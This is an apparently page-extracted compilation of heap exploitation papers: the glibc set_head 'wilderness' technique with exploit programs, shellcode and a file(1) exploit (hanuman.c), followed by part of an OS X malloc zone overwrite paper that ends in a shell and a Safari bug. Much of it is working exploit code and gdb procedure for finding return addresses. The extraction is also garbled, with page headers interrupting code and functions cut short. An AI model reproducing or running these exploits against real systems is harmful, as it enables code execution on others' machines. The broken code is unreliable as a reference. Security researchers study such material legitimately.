to set_head(). Let's analyze the use_top code:
01 Void_t*
02 _int_malloc(mstate av, size_t bytes)
03 {
04 INTERNAL_SIZE_T nb; /* normalized request size */
05
06 mchunkptr victim; /* inspected/selected chunk */
07 INTERNAL_SIZE_T size; /* its size */
08
09 mchunkptr remainder; /* remainder from a split */
10 unsigned long remainder_size; /* its size */
11
12
13 checked_request2size(bytes, nb);
14
15 [ ... ]
16
17 use_top:
18
19 victim = av->top;
20 size = chunksize(victim);
21
22 if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
23 remainder_size = size - nb;
24 remainder = chunk_at_offset(victim, nb);
25 av->top = remainder;
26 set_head(victim, nb | PREV_INUSE |
27 (av != &main_arena ? NON_MAIN_ARENA : 0));
28 set_head(remainder, remainder_size | PREV_INUSE);
29
30 check_malloced_chunk(av, victim, nb);
31 return chunk2mem(victim);
32 }
All the magic happens at line 28. By forcing a particular context inside
the application, it's possible to control set_head's parameters and then
overwrite almost any memory addresses with almost four arbitrary bytes.
Let's see how it's possible to control these two parameters, which are
'remainder' and 'remainder_size' :
Page
175
[5. The use of set_head to defeat the wilderness – g463]
b. Then, at line 19, the variable 'victim' gets filled with the
address of the top chunk.
Finally, at line 28, the set_head() macro modifies the size field of the
fake remainder chunk and fills it with the content of the variable
'remainder_size'. This is how you get your "write almost 4 arbitrary bytes
to almost anywhere in memory" primitive.
--[ 3 - Automation
Before trying to exploit a security hole with the set_head technique, the
attacker needs to define the parameters of the vulnerable context. These
parameters are:
2. The return address: This is the content that you will write to
Page
176
[5. The use of set_head to defeat the wilderness – g463]
The attacker has control on two things during the exploitation stage.
First, the content of the overwritten top chunk's size field and secondly,
the size parameter to the malloc call. The values that the attacker
chooses for these will determine the exact content of the variables
'remainder' and 'remainder_size' later used by the set_head() macro.
Below, two formulas are presented to help the attacker find the appropriate
values.
remainder = chunk_at_offset(victim, nb + 8)
2. The second formula is how to get the new size of the top chunk.
Page
177
[5. The use of set_head to defeat the wilderness – g463]
(i.e. retadr'):
You can now proceed with finding the exact values that you will plug into
your exploit.
struct sethead {
unsigned long topchunk_size;
unsigned long malloc_size;
}
By giving this function your return location, your return address and your
top chunk location, it will compute the exact malloc size and top chunk
size to use in your exploit. It will also tell you if it's possible to
execute the requested write operation based on the return address and the
return location you have chosen.
--[ 4 - Limitations
At the time of writing this paper, there was no simple and easy way to
exploit a heap overflow when the top chunk is involved. Each exploitation
technique needs a particular context to work successfully. The set_head
Page
178
[5. The use of set_head to defeat the wilderness – g463]
Minimum requirements:
This technique will let you write almost 4 arbitrary bytes to almost
anywhere.
Minimum requirements:
This technique will, in the best-case scenario, let you overwrite any
region in memory with a string of an arbitrary length that you control.
Below you will find the three main restrictions of this technique:
Page
179
[5. The use of set_head to defeat the wilderness – g463]
- checked_request2size() and
- chunksize()
Ultimately, this will have some influence on the selection of the return
location and the return address.
The memory addresses that you can overwrite with the set_head technique
need to be aligned on a 8 bytes boundary. Interesting locations to
overwrite on the stack usually include a saved EIP of a stack frame or a
function pointer. These pointers are aligned on a 4 bytes boundary, so with
this technique, you will be able to modify one memory address on two.
The return address will also need to be a multiple of 8 (not counting the
logical OR with PREV_INUSE). Normally, the attacker has the possibility of
providing a NOP cushion right before his shellcode, so this is not really a
big issue.
------[ 4.2.2 - Top chunk's size needs to be bigger than the requested
malloc size
This is the main disadvantage of the set_head technique. For the top chunk
code to be triggered and serve the memory request, there is a verification
before the top chunk code is executed:
In short, this line requires that the size of the top chunk is bigger than
the size requested by the malloc call. Since the variable 'size' and 'nb'
are computed from the return location, the return address and the top
chunk's location, it will greatly limit the content and the location of the
arbitrary overwrite operation. There is still a valid combination of a
return address and a return location that exists.
Let's see what the value of 'size' and 'nb' for a given return location and
return address will be. Let's find out when there is a situation in which
'size' is greater than 'nb'. Consider the fact that the location of the
top chunk is static and it's at 0x080614f8:
+------------+------------++------------+------------+
| return | return || size | nb |
| location | address || | |
+------------+------------++------------+------------+
| 0x0804b150 | 0x08061000 || 134523993 | 4294876240 |
| 0x0804b150 | 0xbffffbaa || 3221133059 | 4294876240 |
| 0xbffffaaa | 0xbffffbaa || 2012864861 | 3086607786 |
| 0xbffffaaa | 0x08061000 || 3221222835 | 3086607786 | <- !!!!!
+------------+------------++------------+------------+
As you can see from this chart, the only time that you get a situation
where 'size' is greater than 'nb' is when your return location is somewhere
in the stack and when your return address is somewhere in the heap.
Page
180
[5. The use of set_head to defeat the wilderness – g463]
It was said in section 4.2.1 that the return address will always be a
multiple of 8 bytes due to the normalisation of some macros. With the
PREV_INUSE logical OR, it will be a multiple of 8 bytes, plus 1. With an
NOP cushion, this problem is solved. Compared to the previous two, this
restriction is a very small one.
One way to make the exploitation process a lot more reliable is by using
multiple overwrites. Indeed, having the possibility of overwriting a
memory location with 4 bytes is good, but the possibility to write multiple
times to memory is even better[8]. Being able to overwrite multiple memory
locations with set_head will increase your chance of finding a valid return
location on the stack.
To correctly put this technique in place, the attacker will need to start
overwriting addresses at the top of the stack, and go downward until he
seizes control of the program. Here are the possible addresses that
set_head() lets you overwrite on the stack:
1: 0xbffffffc
2: 0xbffffff4
3: 0xbfffffec
4: 0xbfffffe4
5: 0xbfffffdc
6: 0xbfffffd4
7: 0xbfffffcc
8: 0xbfffffc4
9: ...
Page
181
[5. The use of set_head to defeat the wilderness – g463]
Based on the formulas that were found in section 3.3, let's compute the
values for the top chunk size and the size for the malloc call for each
overwrite operation. Let's take the following values for an example case:
+------------++------------+------------+
| return || top chunk | malloc |
| location || size | size |
+------------++------------+------------+
+------------++------------+------------+
| 0xbffffffc || 3221225725 | 3086679796 |
| 0xbffffff4 || 3221225717 | 3086679788 |
| 0xbfffffec || 3221225709 | 3086679780 |
| 0xbfffffe4 || 3221225701 | 3086679772 |
| 0xbfffffdc || 3221225693 | 3086679764 |
| 0xbfffffd4 || 3221225685 | 3086679756 |
| 0xbfffffcc || 3221225677 | 3086679748 |
| 0xbfffffc4 || 3221225669 | 3086679740 |
| ... || ... | ... |
+------------++------------+------------+
By looking at this chart, you can determine that for each overwrite
operation, the attacker would need to overwrite the size of the top chunk
with a new value and make a call to malloc with an arbitrary value. Would
it be possible to improve this a little bit? It would be great if the only
thing you needed to change between each overwrite operation was the size of
the malloc call, leaving the size of the top chunk untouched.
+------------+-----------++------------+------------+
| return | return || top chunk | malloc |
| location | address || size | size |
+------------+-----------++------------+------------+
+------------+-----------++------------+------------+
| 0xbffffffc | 0x8050200 || 3221225725 | 3086679796 |
| 0xbffffff4 | 0x8050208 || 3221225725 | 3086679788 |
| 0xbfffffec | 0x8050210 || 3221225725 | 3086679780 |
Page
182
[5. The use of set_head to defeat the wilderness – g463]
You can see that the size of the top chunk is always the same. On the
other hand, the return address changes through the multiple overwrites.
The attacker needs to have an NOP cushion big enough to adapt to this
variation.
The theory behind this technique is simple. If the attacker has the real
address of the top chunk, he will be able to write at the address
0xbffffffc but not at the address 0xc0000004.
Indeed, a write operation at the address 0xbffffffc will work because this
address is in the stack and its purpose is to store the environment
variables of the program. It does not significantly affect the behaviour
of the program, so the program will still continue to run normally.
Below, you will find the parameters of the exploitable situation to use
during the 6 write operations. The expected result is in the right column
of the chart. If you get these results, then the value used for the
location of the top chunk is the right one.
Page
183
[5. The use of set_head to defeat the wilderness – g463]
+------------+------------++--------------+
| return | return || Did it |
| location | address || segfault ? |
+------------+------------++--------------+
+------------+------------++--------------+
| 0xc0000014 | 0x07070707 || Yes |
| 0xc000000c | 0x07070707 || Yes |
| 0xc0000004 | 0x07070707 || Yes |
| 0xbffffffc | 0x07070707 || No |
| 0xbffffff4 | 0x07070707 || No |
| 0xbfffffec | 0x07070707 || No |
+------------+------------++--------------+
If the six write operations made the program segfault each time, then the
attacker is probably writing after 0xbfffffff or below the limit of the
stack.
If the 6 write operations succeeded and the program did not crash, then it
probably means that the attacker overwrote some values in the stack. In
that case, decrement the value of the top chunk location to use.
--[ 6 - Examples
The best way to learn something new is probably with the help of examples.
Below, you will find some vulnerable codes and their exploits.
This scenario is the most basic form of the application of the set_head()
technique. This is the approach that was used in the file(1) utility
exploit.
char *buffer1;
char *buffer2;
unsigned long size;
Page
184
[5. The use of set_head to defeat the wilderness – g463]
return 0;
}
--------------------------- end of scenario1.c ----------------------------
[1]: The top chunk is split and a memory region of 1024 bytes is requested.
[2]: A sprintf call is made. The destination buffer is not checked to see
if it is large enough. The top chunk can then be overwritten here.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct sethead {
unsigned long topchunk_size;
unsigned long malloc_size;
};
Page
185
[5. The use of set_head to defeat the wilderness – g463]
"\xcf\xea\xc0\xb3\x27\xcd\xa2\xda\x49\xcd\xb3\xdb\x27\xb5\x93\x3a"
"\xc6\x2f\x40\xb3";
if ( (toploc % 8) != 0 ) {
fprintf (stderr,
"--[ Impossible to use 0x%x as the top chunk location.",
toploc);
Page
186
[5. The use of set_head to defeat the wilderness – g463]
retadr);
return shead;
}
void
put_byte (char *ptr, unsigned char data) {
*ptr = data;
}
void
put_longword (char *ptr, unsigned long data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
put_byte (ptr + 2, data >> 16);
put_byte (ptr + 3, data >> 24);
}
char *buffer;
char malloc_size_string[20];
unsigned long retloc, retadr, toploc;
unsigned long topchunk_size, malloc_size;
struct sethead *shead;
if ( argc != 4) {
printf ("wrong number of arguments, exiting...\n\n");
printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
return 1;
}
return 0;
}
--------------------------- end of exp1.c ---------------------------------
Here are the steps to find the 3 memory values to use for this exploit.
Page
187
[5. The use of set_head to defeat the wilderness – g463]
1- The first step is to generate a core dump file from the vulnerable
program. You will then have to analyze this core dump to find the proper
values for your exploit.
To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section. Normally, the heap will
start just after the BSS section:
The BSS section starts at 0x080495e4. Let's call the exploit the following
way, and remember to replace 0x080495e4 for the BSS value you have found:
3- The ESI register contains the address of the top chunk. It might be
another register for you.
4- Start searching before the location of the top chunk to find the NOP
cushion. This will be the return address.
Page
188
[5. The use of set_head to defeat the wilderness – g463]
5- To get the return location for your exploit, get a saved EIP from a
stack frame.
(gdb) frame 2
#2 0x0804840a in main ()
(gdb) x $ebp+4
0xbffff52c: 0x4002980c
(gdb)
6- You can now call the exploit with the values that you have found.
char *buffer1;
char *buffer2;
unsigned long size;
/* [3] */ do {
size = 0;
scanf ("%u", &size);
/* [4] */ buffer2 = (char *) malloc (size);
/*
* Random code
*/
Page
189
[5. The use of set_head to defeat the wilderness – g463]
return 0;
}
------------------------- end of scenario2.c ------------------------------
[1]: A memory region of 4096 bytes is requested. The top chunk is split
and the request is serviced.
[2]: A call to fgets is made. The destination buffer is not checked to see
if it is large enough. The top chunk can then be overwritten here.
[3]: The program enters a loop. It reads from 'stdin' until the number '0'
is entered.
[4]: A call to malloc is done with 'size' as the parameter. The loop does
not end until size equals '0'. This gives the attacker the
possibility of overwriting the memory multiple times.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct sethead {
unsigned long topchunk_size;
unsigned long malloc_size;
};
Page
190
[5. The use of set_head to defeat the wilderness – g463]
http://metasploit.com */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4f"
"\x3d\x1a\x3d\x83\xeb\xfc\xe2\xf4\x25\x36\x42\xa4\x1d\x5b\x72\x10"
"\x2c\xb4\xfd\x55\x60\x4e\x72\x3d\x27\x12\x78\x54\x21\xb4\xf9\x6f"
"\xa7\x35\x1a\x3d\x4f\x12\x78\x54\x21\x12\x73\x59\x4f\x6a\x49\xb4"
"\xae\xf0\x9a\x3d";
if ( (toploc % 8) != 0 ) {
fprintf (stderr,
"--[ Impossible to use 0x%x as the top chunk location.",
toploc);
Page
191
[5. The use of set_head to defeat the wilderness – g463]
fprintf (stderr,
"--[ Impossible to use 0x%x as the return address.", retadr);
fprintf (stderr, " Using 0x%x instead\n", check_retadr);
} else
fprintf (stderr, "--[ Using 0x%x as the return address.\n",
retadr);
return shead;
}
void
put_byte (char *ptr, unsigned char data) {
*ptr = data;
}
void
put_longword (char *ptr, unsigned long data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
put_byte (ptr + 2, data >> 16);
put_byte (ptr + 3, data >> 24);
}
char *buffer;
char malloc_size_buffer[20];
unsigned long retloc, retadr, toploc;
unsigned long topchunk_size, malloc_size;
struct sethead *shead;
int i;
if ( argc != 4) {
printf ("wrong number of arguments, exiting...\n\n");
printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
return 1;
}
Page
192
[5. The use of set_head to defeat the wilderness – g463]
retloc = retloc - 8;
retadr = retadr + 8;
free (shead);
}
return 0;
}
--------------------------- end of exp2.c ---------------------------------
Here are the steps to find the memory values to use for this exploit.
1- The first step is to generate a core dump file from the vulnerable
program. You will then have to analyze this core dump to find the proper
values for your exploit.
To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section. Normally, the heap will
start just after the BSS section:
The BSS section starts at 0x0804964c. Let's call the exploit the following
way, and remember to replace 0x0804964c for the BSS value you have found:
Page
193
[5. The use of set_head to defeat the wilderness – g463]
(gdb)
3- The ESI register contains the address of the top chunk. It might be
another register for you.
4- For the return address, get a memory address at the beginning of the NOP
cushion:
5- You can now call the exploit with the values that you have found. The
return location will be 0xbffffffc, and it will decrement with each write.
The shellcode in exp2.c executes /bin/id.
The set_head technique was developed during the research of a security hole
in the UNIX file(1) utility. This utility is an automatic file content
type recognition tool found on many UNIX systems. The versions affected
are Ian Darwin's version 4.00 to 4.19, maintained by Christos Zoulas. This
version is the standard version of file(1) for Linux, *BSD, and other
systems, maintained by Christos Zoulas.
The main reason why so much energy was put in the development of this
exploit is mainly because the presence of a vulnerability in this utility
represents a high security risk for an SMTP content filter.
An SMTP content filter is a system that acts after the SMTP server receives
email and applies various filtering policies defined by a network
administrator. Once the scanning process is finished, the filter decides
Page
194
[5. The use of set_head to defeat the wilderness – g463]
- Dearchivers;
- Decoders;
- Classifiers;
- Antivirus;
- and many more ...
01 protected int
02 file_printf(struct magic_set *ms, const char *fmt, ...)
03 {
04 va_list ap;
05 size_t len;
06 char *buf;
07
08 va_start(ap, fmt);
09 if ((len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap)) >= ms->
o.len) {
10 va_end(ap);
11 if ((buf = realloc(ms->o.buf, len + 1024)) == NULL) {
12 file_oomem(ms, len + 1024);
13 return -1;
14 }
15 ms->o.ptr = buf + (ms->o.ptr - ms->o.buf);
16 ms->o.buf = buf;
17 ms->o.len = ms->o.size - (ms->o.ptr - ms->o.buf);
18 ms->o.size = len + 1024;
19
20 va_start(ap, fmt);
21 len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap);
22 }
23 ms->o.ptr += len;
24 ms->o.len -= len;
25 va_end(ap);
26 return 0;
27 }
Page
195
[5. The use of set_head to defeat the wilderness – g463]
At first sight, this function seems to take good care of not overflowing
the 'ms->o.ptr' buffer. A first copy is done at line 09. If the
destination buffer, 'ms->o.buf', is not big enough to receive the character
string, the memory region is reallocated.
The reallocation is done at line 11, but the new size is not computed
properly. Indeed, the function assumes that the buffer should never be
bigger than 1024 added to the current length of the processed string.
The real problem is at line 21. The variable 'ms->o.len' represents the
number of bytes left in 'ms->o.buf'. The variable 'len', on the other
hand, represents the number of characters (not including the trailing
'\0') which would have been written to the final string if enough space had
been available. In the event that the buffer to be printed would be larger
than 'ms->o.len', 'len' would contain a value greater than 'ms->o.len'.
Then, at line 24, 'len' would get subtracted from 'ms->o.len'. 'ms->o.len'
could underflow below 0, and it would become a very big positive integer
because 'ms->o.len' is of type 'size_t'. Subsequent vsnprintf() calls
would then receive a very big length parameter thus rendering any bound
checking capabilities useless.
/*
* Extract the program name. It is at
* offset 0x7c, and is up to 32-bytes,
* including the terminating NUL.
*/
if (file_printf(ms, ", from '%.31s'",
&nbuf[doff + 0x7c]) == -1)
return size;
After a couple of tries overflowing the header of the next chunk, it was
clear that the only thing that was overflowable was the wilderness chunk.
It was not possible to provoke a situation where a chunk that was not
adjacent to the top chunk could be overflowable with user controllable
data.
The file utility suffers from this buffer overflow since the 4.00 release
when the first version of file_printf() was introduced. A successful
exploitation was only possible starting from version 4.16. Indeed, this
version included a call to malloc with a user controllable variable. From
readelf.c:
Page
196
[5. The use of set_head to defeat the wilderness – g463]
This was the missing piece of the puzzle. Now, every condition is met to
use the set_head() technique.
/*
* hanuman.c
*
* file(1) exploit for version 4.16 to 4.19.
* Coded by Jean-Sebastien Guay-Leroux
* http://www.guay-leroux.com
*
*/
/*
Here are the steps to find the 3 memory values to use for the file(1)
exploit.
1- The first step is to generate a core dump file from file(1). You will
then have to analyze this core dump to find the proper values for your
exploit.
To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section:
Section Headers:
[Nr] Name Type Addr
[ 0] NULL 00000000
[ 1] .interp PROGBITS 080480f4
[...]
[22] .bss NOBITS 0804b1e0
The BSS section starts at 0x0804b1e0. Let's call the exploit the following
way, and remember to replace 0x0804b1e0 for the BSS value you have found:
Page
197
[5. The use of set_head to defeat the wilderness – g463]
3- The EAX register contains the address of the top chunk. It might be
another register for you.
4- Start searching from the location of the top chunk to find the NOP
cushion. This will be the return address.
5- To get the return location for your exploit, get a saved EIP from a
stack frame.
(gdb) frame 3
#3 0x4001f32e in file_tryelf (ms=0x804bc90, fd=3, buf=0x0, nbytes=8192) at
readelf.c:1007
1007 if (doshn(ms, class, swap, fd,
(gdb) x $ebp+4
0xbffff7fc: 0x400172b3
(gdb)
6- You can now call the exploit with the values that you have found.
Page
198
[5. The use of set_head to defeat the wilderness – g463]
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#define DEBUG 0
#define initial_ELF_garbage 75
//ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically
// linked
#define initial_netbsd_garbage 22
//, NetBSD-style, from '
#define post_netbsd_garbage 12
//' (signal 0)
struct math {
Page
199
[5. The use of set_head to defeat the wilderness – g463]
int nnetbsd;
int nname;
};
struct sethead {
unsigned long topchunk_size;
unsigned long malloc_size;
};
typedef struct
{
uint32_t sh_name;
uint32_t sh_type;
uint32_t sh_flags;
uint32_t sh_addr;
uint32_t sh_offset;
uint32_t sh_size;
uint32_t sh_link;
uint32_t sh_info;
uint32_t sh_addralign;
uint32_t sh_entsize;
} Elf32_Shdr;
typedef struct
{
uint32_t n_namesz;
uint32_t n_descsz;
uint32_t n_type;
} Elf32_Nhdr;
Page
200
[5. The use of set_head to defeat the wilderness – g463]
if ( (toploc % 8) != 0 ) {
fprintf (stderr,
"--[ Impossible to use 0x%x as the top chunk location.",
toploc);
return shead;
}
/*
Not CPU friendly :)
*/
struct math *
compute (int offset) {
int accumulator = 0;
Page
201
[5. The use of set_head to defeat the wilderness – g463]
int i, j;
struct math *math;
if (math == NULL) {
printf ("--[ Could not allocate memory for math structure\n");
exit (1);
}
accumulator = 0;
accumulator += initial_ELF_garbage;
accumulator += (i * (initial_netbsd_garbage +
post_netbsd_garbage));
accumulator += initial_netbsd_garbage;
accumulator += j;
if (accumulator == offset) {
math->nnetbsd = i;
math->nname = j;
return math;
}
}
}
void
put_byte (char *ptr, unsigned char data) {
*ptr = data;
}
void
put_longword (char *ptr, unsigned long data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
put_byte (ptr + 2, data >> 16);
put_byte (ptr + 3, data >> 24);
}
FILE *
open_file (char *filename) {
FILE *fp;
if (!fp) {
perror ("Cant open file");
exit (1);
Page
202
[5. The use of set_head to defeat the wilderness – g463]
return fp;
}
void
usage (char *progname) {
exit (1);
}
int
main (int argc, char *argv[]) {
FILE *fp;
Elf32_Ehdr *elfhdr;
Elf32_Shdr *elfshdr;
Elf32_Nhdr *elfnhdr;
char *filename;
char *buffer, *ptr;
int i;
struct math *math;
struct sethead *shead;
int left_bytes;
unsigned long retloc, retadr, toploc;
unsigned long topchunk_size, malloc_size;
if ( argc != 5) {
usage ( argv[0] );
}
Page
203
[5. The use of set_head to defeat the wilderness – g463]
topchunk_size = shead->topchunk_size;
malloc_size = shead->malloc_size;
ptr = buffer;
elfhdr = (Elf32_Ehdr *) ptr;
ptr += elfhdr->e_ehsize;
elfshdr = (Elf32_Shdr *) ptr;
Page
204
[5. The use of set_head to defeat the wilderness – g463]
elfshdr->sh_offset = OFFSET_SHELLCODE;
}
elfshdr++;
}
Page
205
[5. The use of set_head to defeat the wilderness – g463]
fp = open_file (filename);
if (fwrite (buffer, 8192, 1, fp) != 0 ) {
printf ("--[ The file has been written\n");
} else {
printf ("--[ Can not write to the file\n");
exit (1);
}
fclose (fp);
free (shead);
free (math);
free (buffer);
free (filename);
return 0;
}
Page
206
[5. The use of set_head to defeat the wilderness – g463]
That's all for the details of this technique; a lot has already been said
through this paper. By looking at the complexity of the malloc code, there
are probably many other ways to take control of a process by corrupting the
malloc chunks.
--[ 8 - References
2. Anonymous, http://www.phrack.org/archives/57/p57-0x09
4. Phantasmal Phantasmagoria,
http://www.packetstormsecurity.org/papers/attack/MallocMaleficarum.txt
5. Phantasmal Phantasmagoria,
http://seclists.org/vuln-dev/2004/Feb/0025.html
6. jp,
http://www.phrack.org/archives/61/p61-0x06_Advanced_malloc_exploits.txt
8. gera, http://www.phrack.org/archives/59/p59-0x07.txt
Page
207
[6. OS X heap exploitation techniques - nemo]
1 - Introduction
2 - Overview of the Apple OS X userland heap implementation
2.1 - Environment Variables
2.2 - Zones
2.3 - Blocks
2.4 - Heap initialization
3 - A sample overflow
4 - A real life example (WebKit)
5 - Miscellaneous
5.1 - Wrap-around Bug
5.2 - Double free()'s
5.3 - Beating ptrace()
6 - Conclusion
7 - References
--[ 1 - Introduction.
The malloc() implementation found in Apple's Libc-391 and earlier (at the
time of writing this) is written by Bertrand Serlet. It is a relatively
complex memory allocator made up of memory "zones", which are variable
size portions of virtual memory, and "blocks", which are allocated from
within these zones. It is possible to have multiple zones, however most
applications tend to stick to just using the default zone.
The source for the implementation of the Apple malloc() is available from
[6]. (The current version of the source at the time of writing this is
10.4.1).
To access it you need to be a member of the ADC, which is free to sign up.
(or if you can't be bothered signing up use the login/password from
Bug Me Not [7] ;)
Page
209
[6. OS X heap exploitation techniques - nemo]
We will now look at the variables which are of the most use to us when
exploiting an overflow.
NOTE: The "heap" tool can be used to inspect the current heap of a
process the Zones are displayed as well as any objects which are
currently allocated. This tool can be used without setting an
environment variable.
A single zone can be thought of a single heap. When the zone is destroyed
all the blocks allocated within it are free()'ed. Zones allow blocks with
similar attributes to be placed together. The zone itself is described by
a malloc_zone_t struct (defined in /usr/include/malloc.h) which is shown
below:
[malloc_zone_t struct]
Page
210
[6. OS X heap exploitation techniques - nemo]
(Well, technically zones are scalable szone_t structs, however the first
element of a szone_t struct consists of a malloc_zone_t struct. This
struct is the most important for us to be familiar with to exploit heap
bugs using the method shown in this paper.)
As you can see, the zone struct contains function pointers for each of the
memory allocation / deallocation functions. This should give you a
pretty good idea of how we can control execution after an overflow.
The size function is used to return the size of the memory allocated. The
destroy() function is used to destroy the entire zone and free all memory
allocated in it.
NOTE:
The malloc_good_size() function is used to return the size of the buffer
after rounding has occurred. An interesting note about this function is
that it contains the same wrap mentioned in 5.1.
printf("0x%x\n",malloc_good_size(0xffffffff));
The szone_t struct contains two pointers, for tiny and small block
allocation. These are shown below:
tiny_region_t *tiny_regions;
small_region_t *small_regions;
Memory allocations which are less than around 500 bytes in size
fall into the "tiny" range. These allocations are allocated from a
pool of vm_allocate()'ed regions of memory. Each of these regions
consists of a 1MB, (in 32-bit mode), or 2MB, (in 64-bit mode) heap.
Following this is some meta-data about the region. Regions are ordered
Page
211
[6. OS X heap exploitation techniques - nemo]
- checksum
- previous
- next
- size
The size field contains the quantum count for the region. A quantum
represents
the size of the allocated blocks of memory within the region.
Allocations of which size falls in the range between 500 bytes and four
virtual pages in size (0x4000) fall into the "small" category.
Memory allocations of "small" range sized blocks, are allocated from a
pool of small regions, pointed to by the "small_regions" pointer in the
szone_t struct. Again this memory is pre-allocated with the vm_allocate()
function. Each "small" region consists of an 8MB heap, followed by the
same meta-data as tiny regions.
Tiny and small allocations are not always guaranteed to be page aligned.
If a block is allocated which is less than a single virtual page size then
obviously the block cannot be aligned to a page.
As you can see below, the malloc() function is merely a wrapper around
the malloc_zone_malloc() function.
Page
212
[6. OS X heap exploitation techniques - nemo]
After this the environment variables are read in (any beginning with
"Malloc"), and parsed in order to set the appropriate flags.
-[Summary]:
For the technique contained within this paper, the most important things
to note is that a szone_t struct is set up in memory. The struct contains
several function pointers which are used to store the address of each of
the appropriate allocation and deallocation functions. When a block of
memory is allocated which falls into the "large" category, the
vm_allocate() mach syscall is used to allocate the memory for this.
Once we receive a SIGTRAP signal and return to the gdb command shell we
can then use the command shown below to locate our initial szone_t
structure in the process memory.
Page
213
[6. OS X heap exploitation techniques - nemo]
In this struct we can see each of the function pointers which are called
for each of the memory allocation/deallocation functions performed using
the default zone. As well as a pointer to the name of the zone, which can
be useful for debugging.
But is it really feasible to write all the way to the address 0x1800000?
(or 0x2800000 outside of gdb). We will look into this now.
First we will check the addresses various sized memory allocations are
given. The location of each buffer is dependant on whether the
allocation size falls into one of the various sized bins mentioned
earlier (tiny, small or large).
To test the location of each of these we can simply compile and run the
following small c program as shown:
printf("initial_malloc_zones @ 0x%x\n",*malloc_zones);
printf("tiny: %p\n",malloc(22));
printf("small: %p\n",malloc(500));
printf("large: %p\n",malloc(0xffffffff));
return 0;
}
Page
214
[6. OS X heap exploitation techniques - nemo]
From the output of this program we can see that it is only possible to
write to the initial_malloc_zones struct from a "tiny" or " large"
buffer. Also, in order to overwrite the function pointers contained within
this struct we need to write a considerable amount of data completely
destroying sections of the zone. Thankfully many situations exist in
typical software which allow these criteria to be met. This is discussed
in the final section of this paper.
Now we understand the layout of the heap a little better, we can use a
small sample program to overwrite the function pointers contained in the
struct to get a shell.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
tmp = malloc(0xdeadbeef);
return 0;
}
(gdb) r
Starting program: /Users/nemo/mtst3
Reading symbols for shared libraries . done
[+] tinyp is @ 0x300120
[+] initial_malloc_zones is @ 0x1800000
[+] Copying 0x14ffef0 bytes.
This is due to the fact that, in between the tinyp pointer and the malloc
function pointer we are trying to overwrite there is some unmapped memory.
In order to get past this we can use the fact that blocks of memory
allocated which fall into the "large" category are allocated using the
Page
215
[6. OS X heap exploitation techniques - nemo]
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
#include <string.h>
extern *malloc_zones;
// small buffer
addr = malloc(22);
printf("[+] malloc_zones (first zone) @ 0x%x\n", *malloc_zones);
printf("[+] addr @ 0x%x\n",addr);
for (a = 0;
a <= ((*malloc_zones - (int) addr) + sizeof(malloc_zone_t)) / 4;
a++)
addr[a] = (int) &shellcode[0];
Page
216
[6. OS X heap exploitation techniques - nemo]
As you can see below, this code function as we'd expect and our
shellcode is executed.
-[nemo@gir:~]$ ./heaptst
[+] malloc_zones (first zone) @ 0x2800000
[+] addr @ 0x500120
[+] addr + 36699872 = 0x2800000
[+] Using shellcode @ 0x3014
[+] finished memcpy()
sh-2.05b$
This library contains many bugs, many of which are exploitable using this
technique. Particular attention should be payed to the code which renders
<TABLE></TABLE> blocks ;)
One of the bugs which i have exploited using this particular method
involves an unchecked length being used to allocate and fill an object in
memory with null bytes (\x00).
If we manage to calculate the write so that it stops mid way through one
of our function pointers in the szone_t struct, we can effectively
truncate the pointer causing execution to jump elsewhere.
The first step to exploiting this bug, is to fire up the debugger (gdb)
and look at what options are available to us.
Once we have Safari loaded up in our debugger, the first thing we need
to check for the exploit to succeed is that we have a clear path to the
initial_malloc_zones struct. To do this in gdb we can put a breakpoint
on the return statement in the malloc() function.
We use the command "disas malloc" to view the assembly listing for the
malloc function. The end of this listing is shown below:
.....
Page
217
[6. OS X heap exploitation techniques - nemo]
The "heap" tool can also be used to see the sizes and numbers of each
allocation.
There are several methods which can be used to set up the heap
correctly for exploitation. One method, suggested by andrewg, is to use a
.png image in order to control the sizes of allocations which occur.
Apparently this method was learn from zen-parse when exploiting a
mozilla bug in the past.
The method which i have used is to create an HTML page which repeatedly
triggers the overflow with various sizes. After playing around with
this for a while, it was possible to regularly allocate enough memory
for the overflow to occur.
Because of the big endian nature of PPC architecture (by default. it can
be changed.) the first few bytes in the pointer make all the difference
and our truncated pointer will now point to the .TEXT segment.
The following gdb output shows our initial_malloc_zones struct after the
heap has been smashed.
Page
218
[6. OS X heap exploitation techniques - nemo]
As you can see, the malloc() pointer is now pointing to somewhere in the
.TEXT segment, and the next call to malloc() will take us there. We can
use gdb to view the instructions at this address. As you can see in the
following example.
Here we can see that the r31 register must be a valid memory address for
a start following this the dyld_stub_objc_msgSend() function is called
using the "bl" (branch updating link register) instruction. Again we can
